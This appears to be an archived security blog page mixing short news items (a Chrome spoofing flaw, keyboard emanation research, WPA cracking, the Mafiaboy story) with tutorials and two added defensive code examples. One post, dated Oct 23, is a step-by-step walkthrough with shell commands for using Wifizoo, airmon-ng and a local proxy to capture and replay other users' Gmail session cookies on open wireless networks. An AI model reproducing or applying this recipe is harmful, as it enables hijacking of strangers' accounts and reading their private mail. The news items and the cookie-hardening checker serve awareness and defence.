Oct 27

New address spoofing flaw smudges Google’s Chrome

Google’s Chrome browser has been marred by yet another vulnerability, this one allowing attackers to impersonate websites of groups like the Better Business Bureau, PayPal or, well, Google.
Researcher Liu Die Yu of the TopsecTianRongXin research lab in Beijing says the spoofing vulnerability is the result of faulty code inserted by programmers from the Mountain View, California search behemoth. “I don’t see Apple Safari vulnerable in the same way,” he writes in an email to The Register. “They share the same engine(webkit).”
As his Proof of Concept demonstrates, it is in fact possible to send Chrome users to a page under his control while causing the browser’s address bar to display the domain name bbb.org.
A Google representative says Chrome’s spoofing vulnerability is a “known issue” that will be fixed in an update that will be pushed to end users soon. Those too impatient to wait can download version 0.3.154.3 of Chrome on Google’s Dev Channel.

Oct 25

My friend Andrew recently posted a teaser for a new project he’s working on, but with part of the headline pixelated to obscure what the project actually is. My curiosity got the best of me and I decided to do what any self-respecting geek would do: write a program to figure out what the censored text said.

Ultimately I failed to recover most of the censored text (except “to”), so I had to cheat a little. The following video is the program running on a very similar image I created. This proves it works in ideal conditions, but needs some improvement to work in less than ideal cases.

Applying a filter like Photoshop’s “mosaic” filter obscures the original data, but doesn’t remove it entirely. If we can reconstruct an image with known text that looks very similar to the original image, then we can be pretty sure the original text is the same as our known text.
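The point above, that a mosaic obscures data without removing it, can be checked on a toy image. The following is an added example, not code from the original post: the 3x5 font, the candidate words and the block size are constructed assumptions. It compares a mosaic with a solid fill, which produces the same image for every candidate and so leaves nothing to match against.

```python
# Constructed 3x5 toy glyphs (hypothetical font, not from the original post).
FONT = {
    "t": ["111", "010", "010", "010", "010"],
    "o": ["111", "101", "101", "101", "111"],
    "d": ["110", "101", "101", "101", "110"],
    "g": ["111", "100", "101", "101", "111"],
}
CANDIDATES = ["do", "go", "to", "od", "ot"]  # constructed guesses


def render(text):
    """Draw text as a 5-row grid of 0/1 pixels, one blank column between glyphs."""
    rows = ["0".join(FONT[ch][r] for ch in text) for r in range(5)]
    return [[int(p) for p in row] for row in rows]


def mosaic(img, block):
    """Replace each block x block tile by its average, as a mosaic filter does."""
    h, w = len(img), len(img[0])
    out = []
    for y in range(0, h, block):
        out.append([])
        for x in range(0, w, block):
            tile = [img[j][i] for j in range(y, min(y + block, h))
                    for i in range(x, min(x + block, w))]
            out[-1].append(sum(tile) / len(tile))
    return out


def solid_fill(img):
    """Redact by overwriting every pixel with one constant value."""
    return [[0] * len(row) for row in img]


def distance(a, b):
    """Sum of squared pixel differences between two equally sized images."""
    return sum((p - q) ** 2 for ra, rb in zip(a, b) for p, q in zip(ra, rb))


def best_match(censored, candidates, redact):
    """Candidate whose redacted rendering is closest to the censored image."""
    return min(candidates, key=lambda c: distance(redact(render(c)), censored))


def distinct_outputs(candidates, redact):
    """How many different images the redaction yields; 1 means nothing leaks."""
    return len({str(redact(render(c))) for c in candidates})
```

With a 3-pixel block the five candidates still give five different mosaics, while `solid_fill` collapses them to one image.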

Oct 25

Hi friends, today I will be showing how to use the Ettercap-NG tool, for system and network admins and security professionals.

Below are a few of the things we can use Ettercap-NG for:

1) Passive scanning: this can provide information about your network and the attached hosts without sending packets to the machines.

2) Passive OS fingerprinting.

3) Searching for promiscuous NICs in your network.

4) Finding suspicious ARP activity.

5) Finding the unused IP addresses in your network.

6) Gateway discovery: this is used when you have VPN connectivity in the office and want to log in from home, so you need the gateway IP to be added at your home ISP.

There are still a lot of plugins in it, so just try playing with a few of them; you will be surprised how useful it is for things other than ARP poisoning.

Here is the video for the above steps:

http://blip.tv/file/1395545/

Wireless Punter

Oct 23

Today I will teach you how to sniff Gmail cookies on an unsecured wireless network using the Wifizoo tool in BackTrack 3.

1) mkdir /root/Desktop/wifizoo
2) cd /root/Desktop/wifizoo
3) wget http://wifizoo.info/wifizoo_black_v1.3.tar.bz2
4) tar jxvf wifizoo_black_v1.3.tar.bz2
5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3

Now we’ll open the file with kwrite wifizoo.py (a Python script) and modify it to match the interface you use. Row 50 sets the interface;
as my card has an RT73 chipset, I use rausb0.

Code:

6) conf.iface = 'rausb0'

Then make sure you put your Wi-Fi card in monitor mode.

Run this command in another terminal:

7) airmon-ng start rausb0

Then monitor the access points:

8)  airodump-ng rausb0

Then come back to the first terminal

and type this command:

9) python wifizoo.py -i rausb0 (your Interface)

As the output shows, Wifizoo starts its web interface on port 8000 of the local machine, and the proxy is available on port 8080.
This will be very useful later. First, let us connect to the Wifizoo control panel with Firefox:

10) firefox 127.0.0.1:8000

And here’s the Wifizoo administrative interface.

We get down to business by clicking on “Cookies”:

Wifizoo has captured cookies; in the image you can see a Google Mail cookie.
Before you can use these cookies, you must configure Firefox to connect through the proxy running locally on port 8080. This is under Edit, Preferences, Network: check Manual proxy configuration and configure the HTTP proxy on port 8080, then

We can now return to Wifizoo’s “Cookies” panel. When you click on the Gmail cookie (all the information about the cookie, in blue), Wifizoo will automatically set it on the proxy currently in use on port 8080. The indication “Cookie Set!” shows that the cookie has been forged and can be reused.

Then simply click “jump to”; it will take you to Google.com, then click Mail.

You are done: you have sniffed someone else’s cookies.

So never use unsecured wireless networks.

Be secure, stay secure.

Below is the Video Tutorial

http://blip.tv/file/1395678

Tutorial by

WirelessPunter
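The cookies in the tutorial above are readable on an open wireless network only when the browser sends them over plain HTTP. The following is an added example, not part of the original tutorial or of Wifizoo, that a site owner can use to check which cookies would travel in cleartext; the cookie names, values and `example.test` URLs are constructed, and path matching is simplified to a prefix test.

```python
from urllib.parse import urlsplit

# Constructed Set-Cookie headers for a hypothetical webmail site (not captured traffic).
SAMPLE_HEADERS = [
    "session_id=c0ffee; Path=/; HttpOnly",
    "auth_token=deadbeef; Path=/mail; Secure; HttpOnly",
    "prefs=lang-en; Path=/",
]


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, {lowercased attribute: value})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()  # flags such as Secure map to ""
    return name.strip(), attrs


def cleartext_cookies(headers, url):
    """Names of cookies the browser would send unencrypted when requesting url."""
    target = urlsplit(url)
    if target.scheme == "https":
        return []  # TLS encrypts the Cookie request header
    request_path = target.path or "/"
    exposed = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        cookie_path = attrs.get("path") or "/"
        # Without the Secure attribute the cookie is attached to http:// requests too.
        if "secure" not in attrs and request_path.startswith(cookie_path):
            exposed.append(name)
    return exposed


def harden(header):
    """Return the header with the Secure attribute added if it is missing."""
    _, attrs = parse_set_cookie(header)
    return header if "secure" in attrs else header + "; Secure"
```

Any name returned for an `http://` URL is a cookie that a passive listener on an unencrypted network can read; after `harden` the list is empty.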

Oct 21

A team of Swiss researchers say there are several ways to recover keystrokes from wired keyboards by simply measuring the electromagnetic radiations emitted when keys are pressed.

In all, the team of researchers from the Security and Cryptography Laboratory in Lausanne, Switzerland, found four different ways to fully or partially recover keystrokes from wired keyboards at a distance up to 20 meters, even through walls. You can watch the video.

Oct 20

There are lots of tools around to help people carry out ARP-related exploits and if a malicious, Wi-Fi enabled neighbour decided to find out more about your network, this could be an effective way to do it.

The good news is that there are some defences out there. The bad? They can be costly and don’t always deliver the protection you might expect.
Arpdefender is a good example. It’s a solid-state security appliance that you simply connect to your network, then leave to look out for ARP poisoning attacks. It would be excellent if not for the fact that it costs almost £300 and, even if it does detect an attack, will do little more than make an entry in your system logs.

Oct 17

GSS says US hotel WiFi hack attack could happen in UK

IT security consultancy Global Secure Systems has warned that insecure WiFi systems installed at hotels across the UK could be hacked with embarrassing consequences, as has happened with the high-end Thompson hotel chain in the US.

“Weekend reports in the US suggest that a hacker has threatened to release a number of embarrassing emails sent and received by guests and staff at the high-end Thompson hotel chain there,” said David Hobson, GSS’ managing director.

Oct 14

Improved WPA and WPA2 password-cracking tool causes concern…

Elcomsoft’s announcement of an improved version of its Distributed Password Recovery (EDPR) tool that can crack WPA and WPA2 passwords faster has caused concern among users and specialists. The UK’s Secure Computing magazine is quoting Global Secure Systems, a provider of security services, as saying that securing a WLAN solely with WPA or WPA2 is no longer sufficient; additional protection with VPN encryption is necessary.

Oct 13
Cyberintruders used the Internet to crack into at least 18 computer servers at the World Bank Group last July.

The intrusion, revealed Friday in a FoxNews.com story by veteran investigative reporter Richard Behar, underscores how relentlessly criminals probe corporate IT systems, especially banks, say tech-security experts.

Oct 12

A Canadian computer whiz who hacked into some of the world’s most prominent websites when he was just 15 years old revealed in a new tell-all book that he was motivated by a so-called “hacker war.” The hacker, known as Mafiaboy, said that back in 2000 when he cracked sites like Yahoo and eBay, computer hackers frequented chat rooms where they were constantly challenging each other.

“Obviously, as you can see, it got a bit out of hand,” Mafiaboy, whose real name is Michael Calce, said Thursday in an interview on CTV’s Canada AM.

In 2000, a hacker from Montreal known only as Mafiaboy managed to shut down five websites, including Yahoo, eBay and CNN.